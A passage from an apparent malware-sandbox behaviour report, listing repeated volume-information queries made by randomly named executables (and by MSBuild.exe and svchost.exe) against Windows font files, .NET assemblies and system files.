Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Queries volume information: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Queries volume information: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Queries volume information: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe VolumeInformation
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
